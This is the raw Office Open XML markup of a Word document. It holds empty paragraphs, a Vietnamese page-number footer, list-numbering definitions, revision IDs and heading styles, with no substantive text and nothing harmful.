    <w:p w14:paraId="1C2EAD6E" w14:textId="77777777" w:rsidR="00FA2E09" w:rsidRDefault="00FA2E09" w:rsidP="00FA2E09">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74E7ED26" w14:textId="77777777" w:rsidR="00FA2E09" w:rsidRDefault="00FA2E09" w:rsidP="00FA2E09">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB8471F" w14:textId="77777777" w:rsidR="00FA2E09" w:rsidRDefault="00FA2E09" w:rsidP="00FA2E09">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723F56BD" w14:textId="77777777" w:rsidR="00FA2E09" w:rsidRDefault="00FA2E09" w:rsidP="00FA2E09">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3930FBA7" w14:textId="77777777" w:rsidR="00FA2E09" w:rsidRDefault="00FA2E09" w:rsidP="00FA2E09">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3CE782" w14:textId="77777777" w:rsidR="00FA2E09" w:rsidRDefault="00FA2E09" w:rsidP="00FA2E09">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255A5DC7" w14:textId="77777777" w:rsidR="00FA2E09" w:rsidRDefault="00FA2E09" w:rsidP="00FA2E09">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C129265" w14:textId="77777777" w:rsidR="00FA2E09" w:rsidRDefault="00FA2E09" w:rsidP="00FA2E09">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB639B4" w14:textId="77777777" w:rsidR="00FA2E09" w:rsidRDefault="00FA2E09" w:rsidP="00FA2E09">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FA2E09" w:rsidSect="008A7AD8">
      <w:footerReference w:type="default" r:id="rId281"/>
      <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
      <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1418" w:header="720" w:footer="3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5FBA90" w14:textId="77777777" w:rsidR="00775BF0" w:rsidRDefault="00775BF0" w:rsidP="00151DDF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="385E159C" w14:textId="77777777" w:rsidR="00775BF0" w:rsidRDefault="00775BF0" w:rsidP="00151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M Neo Sans Intel">
    <w:altName w:val="Cambria"/>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UTM Viet Sach">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7658394"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="0C783CC1" w14:textId="08C41E00" w:rsidR="00F67FB2" w:rsidRDefault="00A51CB9">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="center"/>
        </w:pPr>
        <w:r>
          <w:t xml:space="preserve">Trang </w:t>
        </w:r>
        <w:r w:rsidR="00F67FB2">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F67FB2">
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r w:rsidR="00F67FB2">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F67FB2">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00F67FB2">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="7BBF6E48" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67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172E35" w14:textId="77777777" w:rsidR="00775BF0" w:rsidRDefault="00775BF0" w:rsidP="00151DDF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0FAA35C0" w14:textId="77777777" w:rsidR="00775BF0" w:rsidRDefault="00775BF0" w:rsidP="00151D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17C4A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C00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D209A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7F02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52B50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0CA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82313"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94422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60054"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E43ED0A4"/>
    <w:lvl w:ilvl="0" w:tplc="04090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="DD4EA86E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsiaTheme="minorHAnsi" w:hAnsi="UTM Neo Sans Inte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74BCF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14626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84845"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="155A76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9184D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C23E54D6"/>
    <w:lvl w:ilvl="0" w:tplc="FC20F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F845D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85E04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1D09B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3E22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115F39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AA0A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51335E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C254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B01FCB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC40B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E75A67"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3446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215510"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F5EE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7E5DFA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6104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1B3B1B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="905CA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4D7C6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A1E4A10"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading1"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading2"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Times New Roman" w:hAnsi="UTM Neo Sans Intel" w:cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading3"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsiaTheme="majorEastAsia" w:hAnsi="UTM Neo Sans Intel" w:cstheme="majorBidi"/>
      </w:r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4A952C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C9FC5C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F75D39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52D66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A625BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DB08F36"/>
    <w:lvl w:ilvl="0" w:tplc="9CE8F04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2F62FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A9D24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0260875">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1785999793">
    <w:abstractNumId w:val="17"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1963610064">
    <w:abstractNumId w:val="17"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="8334339">
    <w:abstractNumId w:val="17"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1126461457">
    <w:abstractNumId w:val="17"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1149398863">
    <w:abstractNumId w:val="17"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="80755947">
    <w:abstractNumId w:val="17"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1767576357">
    <w:abstractNumId w:val="17"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="866522074">
    <w:abstractNumId w:val="17"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="898318914">
    <w:abstractNumId w:val="17"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1375620173">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1157695387">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="73169013">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1156845328">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="498890369">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1066999317">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2064863654">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1046565488">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="647788635">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1835760740">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1041324703">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="812596841">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1051924286">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="187110540">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1028216627">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1644457991">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="666638112">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="306710192">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1683703958">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1624922390">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1411660967">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A88"/>
    <w:rsid w:val="00001AAC"/>
    <w:rsid w:val="00013C9C"/>
    <w:rsid w:val="00015EE1"/>
    <w:rsid w:val="00023CDB"/>
    <w:rsid w:val="00031203"/>
    <w:rsid w:val="00035136"/>
    <w:rsid w:val="00045007"/>
    <w:rsid w:val="00047B91"/>
    <w:rsid w:val="00067F0D"/>
    <w:rsid w:val="000752A4"/>
    <w:rsid w:val="00076645"/>
    <w:rsid w:val="000B1857"/>
    <w:rsid w:val="000B1A1D"/>
    <w:rsid w:val="000B36CA"/>
    <w:rsid w:val="000C3DC0"/>
    <w:rsid w:val="001027BE"/>
    <w:rsid w:val="001035B9"/>
    <w:rsid w:val="001058CB"/>
    <w:rsid w:val="00110508"/>
    <w:rsid w:val="00122000"/>
    <w:rsid w:val="0013183E"/>
    <w:rsid w:val="00142782"/>
    <w:rsid w:val="00151DDF"/>
    <w:rsid w:val="0015692C"/>
    <w:rsid w:val="00191514"/>
    <w:rsid w:val="001A7605"/>
    <w:rsid w:val="001B241C"/>
    <w:rsid w:val="001C2AF7"/>
    <w:rsid w:val="001F070A"/>
    <w:rsid w:val="00211DB1"/>
    <w:rsid w:val="00211E86"/>
    <w:rsid w:val="00235A5C"/>
    <w:rsid w:val="0025405B"/>
    <w:rsid w:val="00263C02"/>
    <w:rsid w:val="00267CFD"/>
    <w:rsid w:val="00294367"/>
    <w:rsid w:val="002A3AFF"/>
    <w:rsid w:val="002B0158"/>
    <w:rsid w:val="002D1304"/>
    <w:rsid w:val="002D7CA0"/>
    <w:rsid w:val="002E4B1D"/>
    <w:rsid w:val="002E7F16"/>
    <w:rsid w:val="002F188A"/>
    <w:rsid w:val="002F50C5"/>
    <w:rsid w:val="0030151F"/>
    <w:rsid w:val="003030E0"/>
    <w:rsid w:val="003275E8"/>
    <w:rsid w:val="00342AD6"/>
    <w:rsid w:val="003528FD"/>
    <w:rsid w:val="00360583"/>
    <w:rsid w:val="003705F5"/>
    <w:rsid w:val="00392965"/>
    <w:rsid w:val="00396898"/>
    <w:rsid w:val="003B497F"/>
    <w:rsid w:val="003C6424"/>
    <w:rsid w:val="003C7D81"/>
    <w:rsid w:val="00401CCB"/>
    <w:rsid w:val="00411D06"/>
    <w:rsid w:val="00424DCB"/>
    <w:rsid w:val="00426C82"/>
    <w:rsid w:val="0043569E"/>
    <w:rsid w:val="00444D4F"/>
    <w:rsid w:val="00455186"/>
    <w:rsid w:val="004732B4"/>
    <w:rsid w:val="00476DE9"/>
    <w:rsid w:val="004B51F7"/>
    <w:rsid w:val="004C5E8B"/>
    <w:rsid w:val="004C7415"/>
    <w:rsid w:val="004D4BC1"/>
    <w:rsid w:val="004D5AC4"/>
    <w:rsid w:val="004E0865"/>
    <w:rsid w:val="004F0E8D"/>
    <w:rsid w:val="004F7CAE"/>
    <w:rsid w:val="0050178A"/>
    <w:rsid w:val="0051641F"/>
    <w:rsid w:val="0052267D"/>
    <w:rsid w:val="005244C0"/>
    <w:rsid w:val="005257C7"/>
    <w:rsid w:val="00541D20"/>
    <w:rsid w:val="00565901"/>
    <w:rsid w:val="0057633F"/>
    <w:rsid w:val="00587695"/>
    <w:rsid w:val="005A1200"/>
    <w:rsid w:val="005A329B"/>
    <w:rsid w:val="005C5A88"/>
    <w:rsid w:val="005C7058"/>
    <w:rsid w:val="005D0569"/>
    <w:rsid w:val="0061795B"/>
    <w:rsid w:val="00620A59"/>
    <w:rsid w:val="006265C0"/>
    <w:rsid w:val="00630D4C"/>
    <w:rsid w:val="00641182"/>
    <w:rsid w:val="0065424E"/>
    <w:rsid w:val="00661828"/>
    <w:rsid w:val="006A069E"/>
    <w:rsid w:val="006B5B84"/>
    <w:rsid w:val="006C0258"/>
    <w:rsid w:val="007152AA"/>
    <w:rsid w:val="00717940"/>
    <w:rsid w:val="00724504"/>
    <w:rsid w:val="00724CB8"/>
    <w:rsid w:val="00737BC7"/>
    <w:rsid w:val="00751C63"/>
    <w:rsid w:val="007529D1"/>
    <w:rsid w:val="007651A3"/>
    <w:rsid w:val="00775BF0"/>
    <w:rsid w:val="00787EED"/>
    <w:rsid w:val="007C62EC"/>
    <w:rsid w:val="007C70D3"/>
    <w:rsid w:val="007E5801"/>
    <w:rsid w:val="007E66A9"/>
    <w:rsid w:val="00815B03"/>
    <w:rsid w:val="0081770C"/>
    <w:rsid w:val="0083524C"/>
    <w:rsid w:val="00837524"/>
    <w:rsid w:val="00856BA7"/>
    <w:rsid w:val="00896A3F"/>
    <w:rsid w:val="008A2509"/>
    <w:rsid w:val="008A5DFB"/>
    <w:rsid w:val="008A6111"/>
    <w:rsid w:val="008A7AD8"/>
    <w:rsid w:val="008C67B8"/>
    <w:rsid w:val="008F6347"/>
    <w:rsid w:val="0090395E"/>
    <w:rsid w:val="009257B6"/>
    <w:rsid w:val="00931C64"/>
    <w:rsid w:val="009328B7"/>
    <w:rsid w:val="00934EC5"/>
    <w:rsid w:val="00940383"/>
    <w:rsid w:val="00947B76"/>
    <w:rsid w:val="0095500E"/>
    <w:rsid w:val="00975765"/>
    <w:rsid w:val="00976F21"/>
    <w:rsid w:val="00986747"/>
    <w:rsid w:val="0099661C"/>
    <w:rsid w:val="00997507"/>
    <w:rsid w:val="00997F8D"/>
    <w:rsid w:val="009A4187"/>
    <w:rsid w:val="009B2963"/>
    <w:rsid w:val="009B397B"/>
    <w:rsid w:val="009D02EA"/>
    <w:rsid w:val="009D0400"/>
    <w:rsid w:val="009E167D"/>
    <w:rsid w:val="00A00786"/>
    <w:rsid w:val="00A132BF"/>
    <w:rsid w:val="00A201FC"/>
    <w:rsid w:val="00A32B0C"/>
    <w:rsid w:val="00A36146"/>
    <w:rsid w:val="00A36D58"/>
    <w:rsid w:val="00A51CB9"/>
    <w:rsid w:val="00A74997"/>
    <w:rsid w:val="00A94235"/>
    <w:rsid w:val="00AC7181"/>
    <w:rsid w:val="00AE1AD4"/>
    <w:rsid w:val="00AE7C29"/>
    <w:rsid w:val="00B10612"/>
    <w:rsid w:val="00B275F0"/>
    <w:rsid w:val="00B30E6E"/>
    <w:rsid w:val="00B33229"/>
    <w:rsid w:val="00B36F44"/>
    <w:rsid w:val="00B44E85"/>
    <w:rsid w:val="00B528F8"/>
    <w:rsid w:val="00B53F9A"/>
    <w:rsid w:val="00B67812"/>
    <w:rsid w:val="00B80D4C"/>
    <w:rsid w:val="00BB4C3E"/>
    <w:rsid w:val="00BC4913"/>
    <w:rsid w:val="00BD0662"/>
    <w:rsid w:val="00BD724C"/>
    <w:rsid w:val="00BE138D"/>
    <w:rsid w:val="00BE76F3"/>
    <w:rsid w:val="00C0405F"/>
    <w:rsid w:val="00C62E7D"/>
    <w:rsid w:val="00C64320"/>
    <w:rsid w:val="00C828B8"/>
    <w:rsid w:val="00C931E7"/>
    <w:rsid w:val="00C96847"/>
    <w:rsid w:val="00CB071E"/>
    <w:rsid w:val="00CC33CE"/>
    <w:rsid w:val="00CF403A"/>
    <w:rsid w:val="00D01A1B"/>
    <w:rsid w:val="00D01C11"/>
    <w:rsid w:val="00D06108"/>
    <w:rsid w:val="00D12B8F"/>
    <w:rsid w:val="00D13F56"/>
    <w:rsid w:val="00D25064"/>
    <w:rsid w:val="00D305CF"/>
    <w:rsid w:val="00D34CE4"/>
    <w:rsid w:val="00DA0487"/>
    <w:rsid w:val="00DA5C44"/>
    <w:rsid w:val="00DA6480"/>
    <w:rsid w:val="00DD169E"/>
    <w:rsid w:val="00DD7BF1"/>
    <w:rsid w:val="00DE0F4E"/>
    <w:rsid w:val="00DF4DD4"/>
    <w:rsid w:val="00E02543"/>
    <w:rsid w:val="00E07BAA"/>
    <w:rsid w:val="00E32A72"/>
    <w:rsid w:val="00E32F69"/>
    <w:rsid w:val="00E360B5"/>
    <w:rsid w:val="00E37D9F"/>
    <w:rsid w:val="00E62DD9"/>
    <w:rsid w:val="00E82341"/>
    <w:rsid w:val="00E868E7"/>
    <w:rsid w:val="00E96EAE"/>
    <w:rsid w:val="00EA4568"/>
    <w:rsid w:val="00EA511C"/>
    <w:rsid w:val="00EB305B"/>
    <w:rsid w:val="00EC0F26"/>
    <w:rsid w:val="00EC17C8"/>
    <w:rsid w:val="00EC447F"/>
    <w:rsid w:val="00EC58A1"/>
    <w:rsid w:val="00F16D3A"/>
    <w:rsid w:val="00F177AC"/>
    <w:rsid w:val="00F2108E"/>
    <w:rsid w:val="00F26440"/>
    <w:rsid w:val="00F41059"/>
    <w:rsid w:val="00F428BE"/>
    <w:rsid w:val="00F42CDC"/>
    <w:rsid w:val="00F5305E"/>
    <w:rsid w:val="00F656A4"/>
    <w:rsid w:val="00F67FB2"/>
    <w:rsid w:val="00F95315"/>
    <w:rsid w:val="00FA2E09"/>
    <w:rsid w:val="00FA486A"/>
    <w:rsid w:val="00FB5E78"/>
    <w:rsid w:val="00FC6546"/>
    <w:rsid w:val="00FF3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CF8C7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8C158678-B732-45B1-9BF3-3ABCD36AD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865"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00151DDF"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00F41059"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="36"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00031203"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="008A7AD8"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="vi"/>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DDF"/>
    <w:rPr>
      <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsiaTheme="majorEastAsia" w:hAnsi="UTM Neo Sans Intel" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F41059"/>
    <w:rPr>
      <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Times New Roman" w:hAnsi="UTM Neo Sans Intel" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="36"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00031203"/>
    <w:rPr>
      <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsiaTheme="majorEastAsia" w:hAnsi="UTM Neo Sans Intel" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="008A7AD8"/>
    <w:rPr>
      <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Times New Roman" w:hAnsi="UTM Neo Sans Intel" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="vi"/>
      <w14:ligatures w14:val="none"/>
